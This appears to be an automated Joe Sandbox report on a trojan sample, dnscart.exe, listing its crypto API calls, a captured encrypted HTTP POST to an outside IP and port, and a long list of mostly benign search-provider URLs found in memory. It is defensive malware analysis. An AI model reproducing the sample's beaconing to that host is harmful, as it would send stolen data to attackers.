Analysis Report

Overview

General Information

Joe Sandbox Version:	21.0.0
Analysis ID:	491
Start time:	21:07:28
Joe Sandbox Product:	Cloud
Start date:	23.01.2018
Overall analysis duration:	0h 11m 24s
Hypervisor based Inspection enabled:	true
Report type:	full
Sample file name:	dnscart.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 HVM (Office 2010, IE8, FF 50.1, Chrome 54.0, Java 1.8.0_111, Adobe Reader DC 2015.02)
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript)
Detection:	MAL
Classification:	mal56.troj.winEXE@11/1@0/3
HCA Information:	Successful, ratio: 94% Number of executed functions: 81 Number of non-executed functions: 152
EGA Information:	Successful, ratio: 80%
Cookbook Comments:	Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): spsys.sys, dllhost.exe Execution Graph export aborted for target sppsvc.exe, PID 2868 because there are no executed function Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryDirectoryFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: mscorsvw.exe, mscorsvw.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	56	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Signature Overview

Click to jump to signature section

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Users\user\Desktop\dnscart.exe	Code function: 2_2_0022914E _snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,CreateMutexW,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	2_2_0022914E
Source: C:\Users\user\Desktop\dnscart.exe	Code function: 2_2_002290BE memset,_snwprintf,GetProcessHeap,HeapFree,CreateMutexW,WaitForSingleObject,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	2_2_002290BE
Source: C:\Users\user\Desktop\dnscart.exe	Code function: 2_2_002291F0 CreateEventW,SignalObjectAndWait,ResetEvent,ReleaseMutex,CloseHandle,GetTickCount,CreateTimerQueueTimer,WaitForSingleObject,DeleteTimerQueueTimer,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	2_2_002291F0
Source: C:\Users\user\Desktop\dnscart.exe	Code function: 2_2_0022259B RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,	2_2_0022259B
Source: C:\Users\user\Desktop\dnscart.exe	Code function: 2_2_00222505 CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,	2_2_00222505
Source: C:\Users\user\Desktop\dnscart.exe	Code function: 2_2_00222447 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptDestroyHash,GetProcessHeap,HeapFree,	2_2_00222447
Source: C:\Users\user\Desktop\dnscart.exe	Code function: 2_2_002224C8 CryptExportKey,CryptDestroyHash,GetProcessHeap,HeapFree,	2_2_002224C8
Source: C:\Windows\SysWOW64\certcache.exe	Code function: 4_2_00132447 GetProcessHeap,RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptEncrypt,CryptDestroyHash,GetProcessHeap,HeapFree,	4_2_00132447
Source: C:\Windows\SysWOW64\certcache.exe	Code function: 4_2_001391F0 CreateEventW,SignalObjectAndWait,ResetEvent,ReleaseMutex,CloseHandle,GetTickCount,CreateTimerQueueTimer,WaitForSingleObject,DeleteTimerQueueTimer,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	4_2_001391F0
Source: C:\Windows\SysWOW64\certcache.exe	Code function: 4_2_0013914E _snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,CreateMutexW,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	4_2_0013914E
Source: C:\Windows\SysWOW64\certcache.exe	Code function: 4_2_001324C8 CryptExportKey,CryptDestroyHash,GetProcessHeap,HeapFree,	4_2_001324C8
Source: C:\Windows\SysWOW64\certcache.exe	Code function: 4_2_001390BE memset,_snwprintf,GetProcessHeap,HeapFree,CreateMutexW,WaitForSingleObject,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	4_2_001390BE
Source: C:\Windows\SysWOW64\certcache.exe	Code function: 4_2_0013259B RtlAllocateHeap,CryptDuplicateHash,memcpy,CryptDecrypt,CryptVerifySignatureW,CryptDestroyHash,GetProcessHeap,HeapFree,	4_2_0013259B
Source: C:\Windows\SysWOW64\certcache.exe	Code function: 4_2_00132505 CryptGetHashParam,CryptDestroyHash,GetProcessHeap,HeapFree,	4_2_00132505

Networking:

Found strings which match to known social media urls

Show sources

Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <SuggestionsURL>http://ie.search.yahoo.com/os?command={SearchTerms}</SuggestionsURL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <FavoriteIcon>http://search.yahoo.co.jp/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <FavoriteIcon>http://search.yahoo.com/favicon.ico</FavoriteIcon> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://br.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://de.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://es.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://espanol.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://fr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://in.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://it.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://kr.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://ru.search.yahoo.com</URL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://sads.myspace.com/</URL> equals www.myspace.com (Myspace)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://search.cn.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://search.yahoo.co.jp</URL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://tw.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://uk.search.yahoo.com/</URL> equals www.yahoo.com (Yahoo)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: Free Hotmail.url equals www.hotmail.com (Hotmail)

Posts data to webserver

Show sources

Source: unknown

HTTP traffic detected: POST / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 69.16.193.12:4143Content-Length: 308Connection: Keep-AliveCache-Control: no-cacheData Raw: 05 2b f7 5b e4 e5 98 1e 24 6e 6a 13 43 d7 1c ef dc 05 87 f3 14 9c 42 81 af 2b 78 ee 2c c5 67 27 99 36 95 3e d3 40 38 4c 3d 39 4e 44 7a 18 44 d1 32 f6 9a 86 2d 61 60 0b 9e 95 3a b4 d3 29 8e 40 57 82 6a d0 91 62 4a d1 83 f1 52 b2 ea 6e 7e 7f e1 b8 9c 3e c3 ed c3 5d af a9 8b 6c 23 2e df 14 6c ef c2 5f e7 5f 38 c9 2e ba c3 7c 0c db bd 28 14 7e de 48 1e d8 63 39 22 97 5a 81 a4 c8 a1 74 eb d3 74 6b ae 5d df 8e f0 72 0b 9a bf e0 ea 18 98 2e 9e 5a 78 d2 ef 27 62 ba b7 31 0d 3c 07 c9 9c 9a 45 15 f5 fb 20 b2 54 33 70 c8 1f f2 51 96 51 76 8d 6d f9 db 50 b6 93 c2 8e cd 63 2a 6a 81 0a 2f 85 8a 20 12 72 88 51 75 d0 26 33 57 24 19 af d3 8a d2 04 7a f3 2b 45 ca 0e bb bd 83 f7 79 cf fc 37 51 e7 27 c1 c3 e4 02 d4 23 9c

Urls found in memory or binary data

Show sources

Source: sppsvc.exe	String found in binary or memory: http://
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://%s.com
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://amazon.fr/
Source: sppsvc.exe	String found in binary or memory: http://api.bing.com/qsml.aspx?query=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://ariadna.elmundo.es/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://arianna.libero.it/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://asp.usatoday.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://auone.jp/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://br.search.yahoo.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://browse.guardian.co.uk/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://busca.buscape.com.br/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://busca.igbusca.com.br/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://busca.orange.es/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://busca.uol.com.br/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://buscador.lycos.es/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://buscador.terra.com.br/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://buscador.terra.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://buscador.terra.es/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://buscar.ozu.es/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://buscar.ya.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://busqueda.aol.com.mx/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://cerca.lycos.it/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://cn.bing.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://cn.bing.com/search?q=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://cnet.search.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://corp.naukri.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://cs.wikipedia.org/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://cs.wikipedia.org/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://cs.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://de.search.yahoo.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://de.wikipedia.org/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://de.wikipedia.org/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://de.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://en.wikipedia.org/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://en.wikipedia.org/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://en.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://es.ask.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://es.search.yahoo.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://es.wikipedia.org/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://es.wikipedia.org/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://es.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://espanol.search.yahoo.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://espn.go.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://find.joins.com/
Source: svchost.exe	String found in binary or memory: http://fontfabrik.comP
Source: svchost.exe	String found in binary or memory: http://fontfabrik.comQ
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://fr.search.yahoo.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://fr.wikipedia.org/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://fr.wikipedia.org/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://fr.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://google.pchome.com.tw/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://home.altervista.org/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: sppsvc.exe	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://images.monster.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://in.search.yahoo.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://it.search.dada.net/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://it.search.yahoo.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://it.wikipedia.org/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://it.wikipedia.org/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://it.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://ja.wikipedia.org/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://ja.wikipedia.org/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://ja.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://jobsearch.monster.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://kr.search.yahoo.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://list.taobao.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://localhost
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://mail.live.com/
Source: sppsvc.exe	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://msk.afisha.ru/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://nl.wikipedia.org/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://nl.wikipedia.org/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://nl.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://p.zhongsou.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://pl.wikipedia.org/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://pl.wikipedia.org/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://pl.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://price.ru/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://price.ru/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://pt.wikipedia.org/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://pt.wikipedia.org/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://pt.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://recherche.linternaute.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://recherche.tf1.fr/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://rover.ebay.com
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://ru.search.yahoo.com
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://ru.wikipedia.org/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://ru.wikipedia.org/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://ru.wikipedia.org/w/api.php?action=opensearch&format=xml&search=
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://sads.myspace.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search-dyn.tiscali.it/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.about.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.alice.it/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.alice.it/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.aol.co.uk/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.aol.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.aol.in/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.atlas.cz/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.auction.co.kr/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.auone.jp/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.books.com.tw/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.centrum.cz/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.chol.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.chol.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.cn.yahoo.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.daum.net/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.daum.net/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.dreamwiz.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.ebay.co.uk/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.ebay.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.ebay.de/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.ebay.es/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.ebay.fr/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.ebay.in/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.ebay.it/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.empas.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.empas.com/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.espn.go.com/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.gamer.com.tw/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.gismeteo.ru/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.goo.ne.jp/
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: certcache.exe, mscorsvw.exe, svchost.exe, sppsvc.exe	String found in binary or memory: http://search.hanafos.com/
